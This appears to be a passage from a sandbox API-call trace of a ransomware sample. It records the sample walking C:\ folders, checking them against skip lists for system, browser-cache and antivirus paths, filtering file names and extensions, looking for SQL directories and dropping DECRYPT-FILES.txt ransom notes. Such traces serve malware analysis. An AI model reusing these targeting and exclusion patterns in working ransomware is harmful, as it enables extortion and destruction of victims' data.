lstrcmpiW (lpString1="sys", lpString2="lnk") returned 1 [0179.681] lstrcmpiW (lpString1="sys", lpString2="exe") returned 1 [0179.681] lstrcmpiW (lpString1="sys", lpString2="sys") returned 0 [0179.681] FindNextFileW (in: hFindFile=0x4796f8, lpFindFileData=0x36ffc7c | out: lpFindFileData=0x36ffc7c*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa6c42120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c42120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0179.681] lstrcmpW (lpString1="MSOCache", lpString2=".") returned 1 [0179.681] lstrcmpW (lpString1="MSOCache", lpString2="..") returned 1 [0179.681] lstrcatW (in: lpString1="MSOCache", lpString2="\\" | out: lpString1="MSOCache\\") returned="MSOCache\\" [0179.681] lstrcatW (in: lpString1="C:\\", lpString2="MSOCache\\" | out: lpString1="C:\\MSOCache\\") returned="C:\\MSOCache\\" [0179.681] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\Program Files") returned 0x0 [0179.681] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch=":\\Windows") returned 0x0 [0179.681] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\Games\\") returned 0x0 [0179.681] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.681] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.681] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.681] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.682] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.682] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\All Users") returned 0x0 [0179.682] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.682] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.682] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.682] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="AhnLab") returned 0x0 [0179.682] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.682] lstrlenW (lpString="C:\\MSOCache\\") returned 12 [0179.682] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.682] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\MSOCache\\\\0a16c9.tmp") returned 23 [0179.682] CreateFileW (lpFileName="C:\\MSOCache\\\\0a16c9.tmp" (normalized: "c:\\msocache\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.682] GetLastError () returned 0x5 [0179.682] lstrlenW (lpString="C:\\MSOCache\\") returned 12 [0179.682] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.682] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\MSOCache\\\\DECRYPT-FILES.txt") returned 30 [0179.682] CreateFileW (lpFileName="C:\\MSOCache\\\\DECRYPT-FILES.txt" (normalized: "c:\\msocache\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.683] lstrlenW (lpString="C:\\MSOCache\\") returned 12 [0179.683] lstrcatW (in: lpString1="C:\\MSOCache\\", lpString2="*" | out: lpString1="C:\\MSOCache\\*") returned="C:\\MSOCache\\*" [0179.683] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW\\", cAlternateFileName="苟眔酯ﲨͯ")) returned 0xffffffff [0179.683] CloseHandle (hObject=0xffffffff) returned 0 [0179.683] FindNextFileW (in: hFindFile=0x4796f8, lpFindFileData=0x36ffc7c | out: lpFindFileData=0x36ffc7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xda5b4860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0179.683] lstrcmpiW (lpString1="pagefile.sys", lpString2="DECRYPT-FILES.txt") returned 1 [0179.683] lstrcmpiW (lpString1="pagefile.sys", lpString2="autorun.inf") returned 1 [0179.683] lstrcmpiW (lpString1="pagefile.sys", lpString2="boot.ini") returned 1 [0179.683] lstrcmpiW (lpString1="pagefile.sys", lpString2="desktop.ini") returned 1 [0179.683] lstrcmpiW (lpString1="pagefile.sys", lpString2="ntuser.dat") returned 1 [0179.684] lstrcmpiW (lpString1="pagefile.sys", lpString2="iconcache.db") returned 1 [0179.684] lstrcmpiW (lpString1="pagefile.sys", lpString2="bootsect.bak") returned 1 [0179.684] lstrcmpiW (lpString1="pagefile.sys", lpString2="ntuser.dat.log") returned 1 [0179.684] lstrcmpiW (lpString1="pagefile.sys", lpString2="thumbs.db") returned -1 [0179.684] lstrcmpiW (lpString1="pagefile.sys", lpString2="Bootfont.bin") returned 1 [0179.684] lstrlenW (lpString="pagefile.sys") returned 12 [0179.684] lstrcmpiW (lpString1="sys", lpString2="lnk") returned 1 [0179.684] lstrcmpiW (lpString1="sys", lpString2="exe") returned 1 [0179.684] lstrcmpiW (lpString1="sys", lpString2="sys") returned 0 [0179.684] FindNextFileW (in: hFindFile=0x4796f8, lpFindFileData=0x36ffc7c | out: lpFindFileData=0x36ffc7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6c68280, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c68280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0179.684] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1 [0179.684] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1 [0179.684] lstrcatW (in: lpString1="PerfLogs", lpString2="\\" | out: lpString1="PerfLogs\\") returned="PerfLogs\\" [0179.684] lstrcatW (in: lpString1="C:\\", lpString2="PerfLogs\\" | out: lpString1="C:\\PerfLogs\\") returned="C:\\PerfLogs\\" [0179.684] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\Program Files") returned 0x0 [0179.684] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch=":\\Windows") returned 0x0 [0179.684] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\Games\\") returned 0x0 [0179.684] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.684] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.684] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.684] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.684] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.684] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\All Users") returned 0x0 [0179.684] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.684] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.684] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.684] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="AhnLab") returned 0x0 [0179.684] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.684] lstrlenW (lpString="C:\\PerfLogs\\") returned 12 [0179.684] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.684] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\PerfLogs\\\\0a16c9.tmp") returned 23 [0179.684] CreateFileW (lpFileName="C:\\PerfLogs\\\\0a16c9.tmp" (normalized: "c:\\perflogs\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.685] GetLastError () returned 0x5 [0179.685] lstrlenW (lpString="C:\\PerfLogs\\") returned 12 [0179.685] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.685] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\PerfLogs\\\\DECRYPT-FILES.txt") returned 30 [0179.685] CreateFileW (lpFileName="C:\\PerfLogs\\\\DECRYPT-FILES.txt" (normalized: "c:\\perflogs\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.686] lstrlenW (lpString="C:\\PerfLogs\\") returned 12 [0179.686] lstrcatW (in: lpString1="C:\\PerfLogs\\", lpString2="*" | out: lpString1="C:\\PerfLogs\\*") returned="C:\\PerfLogs\\*" [0179.687] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW\\", cAlternateFileName="苟眔酯ﲨͯ")) returned 0xffffffff [0179.687] CloseHandle (hObject=0xffffffff) returned 0 [0179.687] FindNextFileW (in: hFindFile=0x4796f8, lpFindFileData=0x36ffc7c | out: lpFindFileData=0x36ffc7c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6cb4540, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cb4540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0179.687] lstrcmpW (lpString1="Program Files", lpString2=".") returned 1 [0179.687] lstrcmpW (lpString1="Program Files", lpString2="..") returned 1 [0179.687] lstrcatW (in: lpString1="Program Files", lpString2="\\" | out: lpString1="Program Files\\") returned="Program Files\\" [0179.687] lstrcatW (in: lpString1="C:\\", lpString2="Program Files\\" | out: lpString1="C:\\Program Files\\") returned="C:\\Program Files\\" [0179.687] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\Program Files") returned="\\Program Files\\" [0179.687] StrStrW (lpFirst="C:\\Program Files\\", lpSrch=":\\Windows") returned 0x0 [0179.687] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\Games\\") returned 0x0 [0179.687] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.687] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.687] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.687] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.687] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.687] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\All Users") returned 0x0 [0179.687] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.687] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.687] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.687] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="AhnLab") returned 0x0 [0179.687] StrStrW (lpFirst="C:\\Program Files\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.687] lstrlenW (lpString="C:\\Program Files\\") returned 17 [0179.687] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.687] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\Program Files\\\\0a16c9.tmp") returned 28 [0179.687] CreateFileW (lpFileName="C:\\Program Files\\\\0a16c9.tmp" (normalized: "c:\\program files\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.687] GetLastError () returned 0x5 [0179.688] lstrlenW (lpString="C:\\Program Files\\") returned 17 [0179.688] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.688] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\Program Files\\\\DECRYPT-FILES.txt") returned 35 [0179.688] CreateFileW (lpFileName="C:\\Program Files\\\\DECRYPT-FILES.txt" (normalized: "c:\\program files\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.689] lstrlenW (lpString="C:\\Program Files\\") returned 17 [0179.689] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="*" | out: lpString1="C:\\Program Files\\*") returned="C:\\Program Files\\*" [0179.689] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6cb4540, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cb4540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479738 [0179.689] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.689] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6cb4540, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cb4540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.689] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.689] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.689] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0179.689] lstrcmpW (lpString1="Common Files", lpString2=".") returned 1 [0179.689] lstrcmpW (lpString1="Common Files", lpString2="..") returned 1 [0179.689] lstrcatW (in: lpString1="Common Files", lpString2="\\" | out: lpString1="Common Files\\") returned="Common Files\\" [0179.689] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Common Files\\" | out: lpString1="C:\\Program Files\\Common Files\\") returned="C:\\Program Files\\Common Files\\" [0179.689] StrStrW (lpFirst="C:\\Program Files\\Common Files\\", lpSrch="SQL") returned 0x0 [0179.689] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c68280, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c68280, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c68280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.689] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.689] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0179.689] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0179.689] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0179.689] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0179.689] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0179.689] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9ef07a9b, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9ef07a9b, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVD Maker", cAlternateFileName="DVDMAK~1")) returned 1 [0179.689] lstrcmpW (lpString1="DVD Maker", lpString2=".") returned 1 [0179.689] lstrcmpW (lpString1="DVD Maker", lpString2="..") returned 1 [0179.689] lstrcatW (in: lpString1="DVD Maker", lpString2="\\" | out: lpString1="DVD Maker\\") returned="DVD Maker\\" [0179.689] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="DVD Maker\\" | out: lpString1="C:\\Program Files\\DVD Maker\\") returned="C:\\Program Files\\DVD Maker\\" [0179.689] StrStrW (lpFirst="C:\\Program Files\\DVD Maker\\", lpSrch="SQL") returned 0x0 [0179.690] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8827ac50, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8827ac50, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0179.690] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0179.690] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0179.690] lstrcatW (in: lpString1="Internet Explorer", lpString2="\\" | out: lpString1="Internet Explorer\\") returned="Internet Explorer\\" [0179.690] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Internet Explorer\\" | out: lpString1="C:\\Program Files\\Internet Explorer\\") returned="C:\\Program Files\\Internet Explorer\\" [0179.690] StrStrW (lpFirst="C:\\Program Files\\Internet Explorer\\", lpSrch="SQL") returned 0x0 [0179.690] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x88208830, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88208830, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0179.690] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2=".") returned 1 [0179.690] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2="..") returned 1 [0179.690] lstrcatW (in: lpString1="Microsoft Analysis Services", lpString2="\\" | out: lpString1="Microsoft Analysis Services\\") returned="Microsoft Analysis Services\\" [0179.690] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Microsoft Analysis Services\\" | out: lpString1="C:\\Program Files\\Microsoft Analysis Services\\") returned="C:\\Program Files\\Microsoft Analysis Services\\" [0179.690] StrStrW (lpFirst="C:\\Program Files\\Microsoft Analysis Services\\", lpSrch="SQL") returned 0x0 [0179.690] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x8822e990, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8822e990, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0179.690] lstrcmpW (lpString1="Microsoft Office", lpString2=".") returned 1 [0179.690] lstrcmpW (lpString1="Microsoft Office", lpString2="..") returned 1 [0179.690] lstrcatW (in: lpString1="Microsoft Office", lpString2="\\" | out: lpString1="Microsoft Office\\") returned="Microsoft Office\\" [0179.690] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Microsoft Office\\" | out: lpString1="C:\\Program Files\\Microsoft Office\\") returned="C:\\Program Files\\Microsoft Office\\" [0179.690] StrStrW (lpFirst="C:\\Program Files\\Microsoft Office\\", lpSrch="SQL") returned 0x0 [0179.690] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6cb4540, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cb4540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft SQL Server Compact Edition", cAlternateFileName="MICROS~3")) returned 1 [0179.690] lstrcmpW (lpString1="Microsoft SQL Server Compact Edition", lpString2=".") returned 1 [0179.690] lstrcmpW (lpString1="Microsoft SQL Server Compact Edition", lpString2="..") returned 1 [0179.690] lstrcatW (in: lpString1="Microsoft SQL Server Compact Edition", lpString2="\\" | out: lpString1="Microsoft SQL Server Compact Edition\\") returned="Microsoft SQL Server Compact Edition\\" [0179.690] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Microsoft SQL Server Compact Edition\\" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\" [0179.690] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="SQL") returned="SQL Server Compact Edition\\" [0179.690] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\Program Files") returned="\\Program Files\\Microsoft SQL Server Compact Edition\\" [0179.690] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch=":\\Windows") returned 0x0 [0179.690] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\Games\\") returned 0x0 [0179.690] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.690] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.690] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.690] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.690] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.690] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\All Users") returned 0x0 [0179.690] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.691] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.691] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.691] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="AhnLab") returned 0x0 [0179.691] StrStrW (lpFirst="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.691] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\") returned 54 [0179.691] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.691] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\\\0a16c9.tmp") returned 65 [0179.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\\\0a16c9.tmp" (normalized: "c:\\program files\\microsoft sql server compact edition\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.698] GetLastError () returned 0x5 [0179.698] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\") returned 54 [0179.698] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.698] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\\\DECRYPT-FILES.txt") returned 72 [0179.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\\\DECRYPT-FILES.txt" (normalized: "c:\\program files\\microsoft sql server compact edition\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 